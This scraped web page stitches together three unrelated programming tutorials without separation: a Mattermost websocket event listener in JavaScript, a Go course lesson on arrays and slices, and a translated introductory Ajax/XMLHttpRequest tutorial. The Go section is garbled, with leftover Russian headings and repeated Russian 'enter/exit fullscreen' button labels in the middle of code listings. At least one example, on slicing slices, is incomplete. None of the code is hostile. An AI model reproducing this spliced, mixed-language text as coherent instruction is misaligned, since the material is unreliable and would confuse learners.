After you have managed the authentication challenge, you can use the token to authenticate against your Mattermost installation. I just started the script on my Mac and connected to my Mattermost server using the websocket (ws) driver. My websocket.js script is written in JavaScript, as that seemed a natural way to connect to a React.js-based frontend.
const WebSocket = require('ws');
var ws = new WebSocket("ws://192.168.0.15:8065/api/v4/websocket");
ws.on('open', function open(){
var msg = {
"seq": 1,
"action": "authentication_challenge",
"data": {
"token": "YOUR TOKEN HERE"
}
};
ws.send(JSON.stringify(msg));
});
ws.onmessage = function (event) {
var obj = JSON.parse(event.data);
console.log(event.data);
if(obj.event == "channel_created"){
console.log("New channel created...")
ExternalCall();
}
else if (obj.event == "channel_viewed") {
console.log("Channel was viewed...")
}
}
function ExternalCall() {
var XMLHttpRequest = require("xmlhttprequest").XMLHttpRequest;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
console.log("State: " + this.readyState);
if (this.readyState === 4) {
console.log("Complete.\nBody length: " + this.responseText.length);
console.log("Body:\n" + this.responseText);
}
};
xhttp.open("POST", "https://httpbin.org/post");
xhttp.send();
}
As you can see, the script is very simple. It opens a new WebSocket connection and uses the token to authenticate against the Mattermost server. The script then listens for events happening on the server and parses them as JSON. As soon as an event matches `channel_created` or `channel_viewed`, a log entry is written.
While this output is just informational, you can add the creation call for SharePoint or some other tool or API right here. I added a small REST call (ExternalCall) to a public API to demonstrate the use case a bit better. You can easily use information like the team_id or user_id provided when the channel was created to gather more data to send to the external system.
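The dispatch inside ws.onmessage boils down to: parse the event JSON, then route on its "event" field. Here is the same routing sketched in Python so it can be tested without a live server; the handler actions are hypothetical placeholders for whatever SharePoint (or other) call you would make:

```python
# Route a Mattermost-style websocket frame to a handler based on its
# "event" field. Handler names and actions are illustrative only.

import json

def route_event(raw, handlers):
    """Parse one websocket frame and call the matching handler, if any."""
    obj = json.loads(raw)
    handler = handlers.get(obj.get("event"))
    return handler(obj) if handler else None

handlers = {
    "channel_created": lambda e: f"create site for channel {e['data'].get('channel_id')}",
    "channel_viewed":  lambda e: "viewed",
}

frame = '{"event": "channel_created", "data": {"channel_id": "abc123"}}'
print(route_event(frame, handlers))  # create site for channel abc123
```

Structuring the dispatch this way keeps the network code (the socket connection) separate from the routing logic, so the latter can be unit-tested in isolation.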
Leave a Reply
Перейти к курсу: Массивы и фрагменты
В этом уроке мы узнаем о массивах и срезах в Go.
Массивы
Что же такое массив?
Массив — это коллекция элементов фиксированного размера одного типа. Элементы массива хранятся последовательно, и доступ к ним можно получить по их index.
Объявление
Мы можем объявить массив следующим образом:
var a [n]T
Войти в полноэкранный режим Выйти из полноэкранного режима
Здесь n — это длина, а T может быть любым типом, например, целым числом, строкой или пользовательской структурой.
Теперь объявим массив целых чисел длиной 4 и выведем его на печать.
func main() {
var arr [4]int
fmt.Println(arr)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[0 0 0 0]
Войти в полноэкранный режим Выйти из полноэкранного режима
По умолчанию все элементы массива инициализируются нулевым значением соответствующего типа массива.
Инициализация
Мы также можем инициализировать массив с помощью литерала массива.
var a [n]T = [n]T{V1, V2, ... Vn}
Вход в полноэкранный режим Выход из полноэкранного режима
func main() {
var arr = [4]int{1, 2, 3, 4}
fmt.Println(arr)
}
$ go run main.go
[1 2 3 4]
We can even use the shorthand declaration.
...
arr := [4]int{1, 2, 3, 4}
Access
Like in other languages, we can access elements using an index, since they are stored sequentially.
func main() {
arr := [4]int{1, 2, 3, 4}
fmt.Println(arr[0])
}
$ go run main.go
1
Iteration
Now let's talk about iteration.
There are several ways to iterate over arrays.
The first is to use a for loop with the len function, which gives us the length of the array.
func main() {
arr := [4]int{1, 2, 3, 4}
for i := 0; i < len(arr); i++ {
fmt.Printf("Index: %d, Element: %d\n", i, arr[i])
}
}
$ go run main.go
Index: 0, Element: 1
Index: 1, Element: 2
Index: 2, Element: 3
Index: 3, Element: 4
Another way is to use the range keyword with a for loop.
func main() {
arr := [4]int{1, 2, 3, 4}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %d\n", i, e)
}
}
$ go run main.go
Index: 0, Element: 1
Index: 1, Element: 2
Index: 2, Element: 3
Index: 3, Element: 4
As we can see, our example works just like before.
But the range keyword is quite versatile and can be used in several ways.
for i, e := range arr {} // Normal usage of range
for _, e := range arr {} // Omit index with _ and use element
for i := range arr {} // Use index only
for range arr {} // Simply loop over the array
Multidimensional arrays
All the arrays we have created so far are one-dimensional. We can also create multidimensional arrays in Go.
Let's look at an example:
func main() {
arr := [2][4]int{
{1, 2, 3, 4},
{5, 6, 7, 8},
}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %d\n", i, e)
}
}
$ go run main.go
Index: 0, Element: [1 2 3 4]
Index: 1, Element: [5 6 7 8]
We can also let the compiler infer the length of the array by using an ellipsis ... instead of the length.
func main() {
arr := [...][4]int{
{1, 2, 3, 4},
{5, 6, 7, 8},
}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %d\n", i, e)
}
}
$ go run main.go
Index: 0, Element: [1 2 3 4]
Index: 1, Element: [5 6 7 8]
Properties
Now let's talk about some properties of arrays.
The length of an array is part of its type. So the arrays a and b below are completely different types, and we cannot assign one to the other.
This also means that we cannot resize an array, since resizing an array would mean changing its type.
package main
func main() {
var a = [4]int{1, 2, 3, 4}
var b [2]int = a // Error, cannot use a (type [4]int) as type [2]int in assignment
}
Arrays in Go are value types, unlike other languages such as C, C++, and Java, where arrays are reference types.
This means that when we assign an array to a new variable or pass an array to a function, the entire array is copied.
So if we make any changes to this copied array, the original array is not affected and remains unchanged.
package main
import "fmt"
func main() {
var a = [7]string{"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}
var b = a // Copy of a is assigned to b
b[0] = "Monday"
fmt.Println(a) // Output: [Mon Tue Wed Thu Fri Sat Sun]
fmt.Println(b) // Output: [Monday Tue Wed Thu Fri Sat Sun]
}
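The same copying behavior applies when an array is passed to a function. Here is a small sketch of our own (the helper `modify` is not from the course):

```go
package main

import "fmt"

// modify receives a copy of the array, so changes stay local to it.
func modify(arr [3]int) {
	arr[0] = 100
}

func main() {
	a := [3]int{1, 2, 3}
	modify(a)
	fmt.Println(a) // [1 2 3] — the original is unchanged
}
```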
Slices
I know what you're thinking: arrays are useful, but a bit inflexible because of the limitations caused by their fixed size.
This brings us to slices. So what is a slice?
A slice is a segment of an array. Slices build on top of arrays and provide more power, flexibility, and convenience.
A slice consists of three things:
• A pointer to the underlying array.
• The length of the segment of the array that the slice contains.
• And the capacity, which is the maximum size up to which the segment can grow.
Similar to the len function, we can determine the capacity of a slice with the built-in cap function. Here is an example:
package main
import "fmt"
func main() {
a := [5]int{20, 15, 5, 30, 25}
s := a[1:4]
// Output: Array: [20 15 5 30 25], Length: 5, Capacity: 5
fmt.Printf("Array: %v, Length: %d, Capacity: %d\n", a, len(a), cap(a))
// Output: Slice [15 5 30], Length: 3, Capacity: 4
fmt.Printf("Slice: %v, Length: %d, Capacity: %d", s, len(s), cap(s))
}
Don't worry, we will discuss everything shown here in detail.
Declaration
Let's see how we can declare a slice.
var s []T
As we can see, we don't need to specify a length. Let's declare a slice of strings and see how it behaves.
func main() {
var s []string
fmt.Println(s)
fmt.Println(s == nil)
}
$ go run main.go
[]
true
So, unlike arrays, the zero value of a slice is nil.
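A useful consequence, worth noting alongside the example above (this addition is ours, not from the course): append works on a nil slice, so you can start appending without initializing the slice first.

```go
package main

import "fmt"

func main() {
	var s []int            // zero value: a nil slice
	s = append(s, 1, 2, 3) // append allocates a backing array as needed
	fmt.Println(s, s == nil) // [1 2 3] false
}
```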
Initialization
There are several ways to initialize our slice. One way is to use the built-in make function.
make([]T, len, cap) []T
func main() {
var s = make([]string, 0, 0)
fmt.Println(s)
}
$ go run main.go
[]
Similar to arrays, we can use a slice literal to initialize our slice.
func main() {
var s = []string{"Go", "TypeScript"}
fmt.Println(s)
}
$ go run main.go
[Go TypeScript]
Another way is to create a slice from an array. Since a slice is a segment of an array, we can create a slice from index low up to index high as follows.
a[low:high]
func main() {
var a = [4]string{
"C++",
"Go",
"Java",
"TypeScript",
}
s1 := a[0:2] // Select indices 0 and 1
s2 := a[:3] // Select the first 3
s3 := a[2:] // Select the last 2
fmt.Println("Array:", a)
fmt.Println("Slice 1:", s1)
fmt.Println("Slice 2:", s2)
fmt.Println("Slice 3:", s3)
}
$ go run main.go
Array: [C++ Go Java TypeScript]
Slice 1: [C++ Go]
Slice 2: [C++ Go Java]
Slice 3: [Java TypeScript]
A missing low index implies 0, and a missing high index implies len(a).
One thing to note here is that we can create slices from other slices, not just from arrays.
var a = []string{
"C++",
"Go",
"Java",
"TypeScript",
}
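To make that concrete, here is a small example of our own that slices the slice declared above and then re-slices the result:

```go
package main

import "fmt"

func main() {
	var a = []string{"C++", "Go", "Java", "TypeScript"}
	s1 := a[1:3] // a slice of a slice
	s2 := s1[:1] // re-slicing the result works the same way
	fmt.Println(s1) // [Go Java]
	fmt.Println(s2) // [Go]
}
```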
Iteration
We can iterate over a slice the same way as over an array, using a for loop with the len function or the range keyword.
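Since no example is shown for this, here is a quick sketch of our own applying both styles to a slice:

```go
package main

import "fmt"

func main() {
	s := []string{"Go", "TypeScript"}
	// A for loop with len:
	for i := 0; i < len(s); i++ {
		fmt.Printf("Index: %d, Element: %s\n", i, s[i])
	}
	// The range keyword:
	for i, e := range s {
		fmt.Printf("Index: %d, Element: %s\n", i, e)
	}
}
```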
Functions
Now let's talk about the built-in slice functions provided in Go.
• copy
The copy() function copies elements from one slice into another. It takes two slices, a destination and a source. It also returns the number of elements copied.
func copy(dst, src []T) int
Let's see how we can use it.
func main() {
s1 := []string{"a", "b", "c", "d"}
s2 := make([]string, len(s1))
e := copy(s2, s1)
fmt.Println("Src:", s1)
fmt.Println("Dst:", s2)
fmt.Println("Elements:", e)
}
$ go run main.go
Src: [a b c d]
Dst: [a b c d]
Elements: 4
As expected, our 4 elements from the source slice were copied into the destination slice.
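One detail worth knowing (it comes from Go's definition of copy, not from the text above): copy copies only min(len(dst), len(src)) elements, so a shorter destination silently drops the extra source elements.

```go
package main

import "fmt"

func main() {
	src := []string{"a", "b", "c", "d"}
	dst := make([]string, 2) // shorter than src
	n := copy(dst, src)
	fmt.Println("Dst:", dst)    // Dst: [a b]
	fmt.Println("Elements:", n) // Elements: 2
}
```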
• append
Now let's look at how we can append data to our slice using the built-in append function, which appends new elements to the end of a given slice.
It takes a slice and a variable number of arguments. It then returns a new slice containing all the elements.
append(slice []T, elems ...T) []T
Let's try it in an example by appending elements to our slice.
func main() {
s1 := []string{"a", "b", "c", "d"}
s2 := append(s1, "e", "f")
fmt.Println("s1:", s1)
fmt.Println("s2:", s2)
}
$ go run main.go
s1: [a b c d]
s2: [a b c d e f]
As we can see, the new elements were appended and a new slice was returned.
But if the given slice does not have enough capacity for the new elements, a new underlying array with a larger capacity is allocated.
All the elements from the existing slice's underlying array are copied into this new array, and then the new elements are appended.
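We can watch this reallocation happen by printing len and cap as we append. This sketch is our own; note that the exact growth factor is implementation-dependent, so treat the capacities printed as illustrative, not guaranteed.

```go
package main

import "fmt"

func main() {
	s := make([]int, 0, 2)
	for i := 1; i <= 5; i++ {
		s = append(s, i)
		fmt.Printf("len=%d cap=%d\n", len(s), cap(s))
	}
	// cap stays 2 for the first two appends; once the capacity is
	// exceeded, append allocates a larger backing array.
}
```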
Properties
Finally, let's discuss some properties of slices.
Unlike arrays, slices are reference types.
This means that modifying the elements of a slice will modify the corresponding elements in the array it references.
package main
import "fmt"
func main() {
a := [7]string{"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}
s := a[0:2]
s[0] = "Sun"
fmt.Println(a) // Output: [Sun Tue Wed Thu Fri Sat Sun]
fmt.Println(s) // Output: [Sun Tue]
}
Slices can also be used with variadic functions.
package main
import "fmt"
func main() {
values := []int{1, 2, 3}
sum := add(values...)
fmt.Println(sum)
}
func add(values ...int) int {
sum := 0
for _, v := range values {
sum += v
}
return sum
}
This article is part of my open-source course on Go, available on GitHub.
karanpratapsingh / go-course
Master the fundamentals and advanced features of the Go programming language
Go Course
Hello, welcome to the course, and thank you for learning Go. I hope this course provides a great learning experience.
This course is also available on my website as well as on Educative.io
Table of Contents
• Getting Started
• What is Go?
• Why learn Go?
• Installation and Setup
• Chapter I
• Hello World
• Variables and Data Types
• String Formatting
• Flow Control
• Functions
• Modules
• Packages
• Workspaces
• Useful Commands
• Build
• Chapter II
• Pointers
• Structs
• Methods
• Arrays and Slices
• Maps
• Chapter III
• Interfaces
• Errors
• Panic and Recover
• Testing
• Generics
• Chapter IV
• Concurrency
• Goroutines
• Channels
• Select
• Sync Package
• Advanced Concurrency Patterns
• Context
• Appendix
• Next Steps
• References
What is Go?
Go (also known as Golang) is a programming language developed at Google in 2007 and open-sourced in 2009.
It focuses on simplicity, reliability, and efficiency. It was designed to combine the efficiency, speed, and safety of a statically typed, compiled language with the ease of…
View on GitHub
devanswers.ru
Complete Ajax Tutorial (Part 1)
• Source: unknown 2019-11-05 09:25:58
Introduction to Ajax
Ajax is made up of HTML, JavaScript™ technology, DHTML, and the DOM. This outstanding approach can turn clunky Web interfaces into interactive Ajax applications. It is a powerful way to build websites.
Ajax tries to bridge the gap between the functionality and interactivity of a desktop application and the constantly refreshing Web application. You can use dynamic user interfaces and attractive controls like those found in desktop applications, but in a Web application.
The basic technologies used in an Ajax application:
1. HTML is used to build the Web form and identify the fields used by the rest of the application.
2. JavaScript code is the core code that runs the Ajax application and helps improve communication with the server application.
3. DHTML, or Dynamic HTML, is used to update the form dynamically. We will use div, span, and other dynamic HTML elements to mark up the HTML.
4. The Document Object Model (DOM) is used (through JavaScript code) to work with the structure of the HTML and (in some cases) the XML returned by the server.
Defining Ajax
Ajax = Asynchronous JavaScript and XML (plus DHTML and so on).
XMLHttpRequest is a JavaScript object; it is the object that handles all server communication. Creating it is simple, as shown in Listing 1.
Listing 1. Creating a new XMLHttpRequest object
<script language="javascript" type="text/javascript">
var xmlHttp = new XMLHttpRequest();</script>
It is JavaScript technology that talks to the server through the XMLHttpRequest object. This is not the usual application flow, and it is exactly where much of Ajax's power comes from.
Ajax basically puts JavaScript technology and the XMLHttpRequest object between the Web form and the server.
Once you have a handle to XMLHttpRequest, use JavaScript code to accomplish the following tasks:
1. Get form data: JavaScript code makes it easy to pull data out of an HTML form and send it to the server.
2. Change data on the form: updating the form is just as simple, from setting field values to quickly swapping out images.
3. Parse HTML and XML: use JavaScript code to manipulate the DOM (see the next section) and to work with the structure of the HTML form and the XML data returned by the server.
For the first two points, you need to be very familiar with the getElementById() method, as shown in Listing 2.
Listing 2. Capturing and setting field values with JavaScript code
// Capturing a field value:
// get the value of the "phone" field and use it to create a variable named phone
var phone = document.getElementById("phone").value;
// Setting field values:
// get values from the response array and write them into the fields
document.getElementById("order").value = response[0];
document.getElementById("address").value = response[1];
What the DOM does
We will dig deeper into the DOM when we need to pass XML between the JavaScript code and the server and to change the HTML form.
Getting a Request object
XMLHttpRequest is the core of an Ajax application.
var xmlhttp;
if (window.XMLHttpRequest)
{// IE7+, Firefox, Chrome, Opera, Safari: get an XMLHttpRequest object
xmlhttp=new XMLHttpRequest();
}
else
{// IE6, IE5: get an XMLHttpRequest object
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
Listing 4. Creating an XMLHttpRequest object in a way that supports multiple browsers
/* Create a new XMLHttpRequest object to talk to the Web server */
var xmlHttp = false;
/*@cc_on @*/
/*@if (@_jscript_version >= 5)
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e2) {
xmlHttp = false;
}
}
@end @*/
if (!xmlHttp && typeof XMLHttpRequest != 'undefined') {
xmlHttp = new XMLHttpRequest();
}
The core of this code is three steps:
1. Create a variable xmlHttp to reference the XMLHttpRequest object that is about to be created.
2. Try to create the object in Microsoft browsers:
1) First try to create it with the Msxml2.XMLHTTP object.
If that fails, try the Microsoft.XMLHTTP object.
3. If xmlHttp still has not been created, create the object the non-Microsoft way. In the end, xmlHttp should reference a valid XMLHttpRequest object, no matter which browser is running.
Ajax request/response
It is JavaScript technology, not an HTML form submitted directly to the application, that deals with the Web application on the server.
Making a request
How do you use the XMLHttpRequest object?
First, you need a Web page that can call a JavaScript method.
Next comes the flow that is basically the same in every Ajax application:
1. Get the data you need from the Web form.
2. Build the URL to connect to.
3. Open a connection to the server.
4. Set a function for the server to run when it finishes.
5. Send the request.
The sample Ajax method in Listing 5 is organized in exactly this order:
Listing 5. Making an Ajax request
function callServer() {
// Get the city and state values from the form
var city = document.getElementById("city").value;
var state = document.getElementById("state").value;
// Bail out of the JavaScript if either value is missing
if ((city == null) || (city == "")) return;
if ((state == null) || (state == "")) return;
// Build the URL to connect to
var url = "/scripts/getZipCode.php?city=" + escape(city) + "&state=" + escape(state);
// Open a connection to the server
xmlHttp.open("GET", url, true);
// Set a method to be called when the request returns
xmlHttp.onreadystatechange = updatePage;
//xmlhttp.onreadystatechange=function()
//{
// if (xmlhttp.readyState==4 && xmlhttp.status==200)
// {
// document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
// }
//}
// Send the request
xmlHttp.send(null);
}
The code at the start uses basic JavaScript to get the values of several form fields. It then sets a PHP script as the target of the connection. Note how the script URL is specified: city and state (from the form) are appended to the URL as simple GET parameters. If the last parameter is set to true, an asynchronous connection is requested (this is where Ajax gets its name). If it is false, the code waits for the server's response after making the request. If it is true, the user can still use the form (and even call other JavaScript methods) while the server processes the request in the background.
The onreadystatechange property tells the browser what to do when the server finishes running. Because the code is not waiting for the server, you must let it know what to do so that you can respond.
In this example, a special method named updatePage() is triggered when the server has finished processing the request.
Finally, send() is called with the value null. Since the data to send to the server (city and state) has already been added to the request URL, the request does not need to send any data. With that, the request goes out and the server does what you asked.
Handling the response
1. Do nothing until the xmlHttp.readyState property equals 4.
2. The server fills the xmlHttp.responseText property with its response.
The first point is the ready state;
the second is using the xmlHttp.responseText property to get the server's response. The sample method in Listing 6 can be called by the server based on the data sent in Listing 5.
Listing 6. Handling the server response
function updatePage() {
if (xmlHttp.readyState == 4) {
var response = xmlHttp.responseText;
document.getElementById("zipCode").value = response;
}
}
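As a side note (based on the XMLHttpRequest specification rather than this article), readyState 4 means the request is done, and robust code usually also checks xmlHttp.status for HTTP 200. The check can be factored into a small testable helper; the name `makeHandler` is our own:

```javascript
// Hypothetical factory: builds an onreadystatechange handler that only
// fires the callback when the request is done (readyState 4) and the
// HTTP status is 200 OK.
function makeHandler(xhr, onDone) {
  return function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
      onDone(xhr.responseText);
    }
  };
}

// Usage sketch:
// xmlHttp.onreadystatechange = makeHandler(xmlHttp, function (text) {
//   document.getElementById("zipCode").value = text;
// });
```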
It waits for the server's call and, when the ready state is reached, uses the value returned by the server (here, the ZIP code for the city and state the user entered) to set the value of another form field.
Once the server returns the ZIP code, the updatePage() method sets that field's value to the city/state ZIP code, and the user can then overwrite it. This is done for two reasons:
to keep the example simple, and to show that sometimes you may want the user to be able to modify the data returned by the server.
Keep these two points in mind; they are important for good user interface design.
Wiring in the Web form
One JavaScript method captures the information the user typed into the form and sends it to the server; another JavaScript method listens for and handles the response, and sets the field values when the response comes back. All of this actually depends on calling the first JavaScript method, which kicks off the whole process.
Updating the form with JavaScript technology.
Listing 7. Kicking off an Ajax process
<form>
<p>City: <input type="text" name="city" id="city" size="25"
onChange="callServer();" /></p>
<p>State: <input type="text" name="state" id="state" size="25"
onChange="callServer();" /></p>
<p>Zip Code: <input type="text" name="zipCode" id="zipCode" size="5" /></p>
</form>
Conclusion
In the next article in this series, you will master:
1. The XMLHttpRequest object
2. How to handle communication between JavaScript and the server
3. How to use HTML forms and how to get a handle on the DOM.
For more on this topic, see the Ajax video tutorials on PHP中文网.
This series:
Complete Ajax Tutorial (Part 2)
Complete Ajax Tutorial (Part 3)
That concludes Complete Ajax Tutorial (Part 1); for more, see the other related articles on Gxl网!